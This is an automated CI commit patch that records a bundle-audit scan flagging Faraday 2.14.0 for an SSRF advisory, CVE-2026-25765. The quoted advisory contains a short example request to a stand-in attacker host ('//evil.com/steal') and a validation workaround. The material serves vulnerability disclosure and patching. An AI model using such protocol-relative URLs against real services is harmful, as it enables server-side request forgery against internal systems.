From 93693ffd181cc2b921c93a12611c71758cc4dd62 Mon Sep 17 00:00:00 2001 From: cicd Date: Thu, 12 Feb 2026 08:49:23 +0100 Subject: [PATCH] commit by to_remotes 2026-02-12 08:49:23 +0100 from cicd --- bundle-audit-time.txt | 2 +- bundle-audit.json | 2 +- report.txt | 11 ++++++++++- update-info.txt | 14 ++++++++++---- 4 files changed, 22 insertions(+), 7 deletions(-) diff --git a/bundle-audit-time.txt b/bundle-audit-time.txt index 7a700a2f..481f9cbf 100644 --- a/bundle-audit-time.txt +++ b/bundle-audit-time.txt @@ -1 +1 @@ -2026-02-11T14:00:03+01:00 +2026-02-12T08:49:23+01:00 diff --git a/bundle-audit.json b/bundle-audit.json index 06959e71..ac8a68fd 100644 --- a/bundle-audit.json +++ b/bundle-audit.json @@ -1 +1 @@ -{"version":"0.9.3","created_at":"2026-02-11 14:00:02 +0100","results":[]} \ No newline at end of file +{"version":"0.9.3","created_at":"2026-02-12 08:49:23 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]} \ No newline at end of file diff --git a/report.txt b/report.txt index 8900c02c..d92b90bb 100644 --- a/report.txt +++ b/report.txt @@ -1 +1,10 @@ -No vulnerabilities found +Name: faraday +Version: 2.14.0 +CVE: CVE-2026-25765 +GHSA: GHSA-33mh-2634-fwr2 +Criticality: Medium +URL: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 +Title: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url +Solution: update to '>= 2.14.1' + +Vulnerabilities found! diff --git a/update-info.txt b/update-info.txt index d8821ac2..20df6d91 100644 --- a/update-info.txt +++ b/update-info.txt @@ -1,7 +1,13 @@ Updating ruby-advisory-db ... -Already up to date. +Updating 1886fa5..826ac19 +Fast-forward + gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml | 45 ++++++++++++++++++++ + gems/faraday/CVE-2026-25765.yml | 75 ++++++++++++++++++++++++++++++++++ + 2 files changed, 120 insertions(+) + create mode 100644 gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml + create mode 100644 gems/faraday/CVE-2026-25765.yml Updated ruby-advisory-db ruby-advisory-db: - advisories: 1056 advisories - last updated: 2026-02-07 16:42:05 -0800 - commit: 1886fa514d2ebe25d6146a1f1c786ac533d51d57 + advisories: 1058 advisories + last updated: 2026-02-11 11:24:37 -0800 + commit: 826ac198fe00af14343d839de644e74bf7d94d84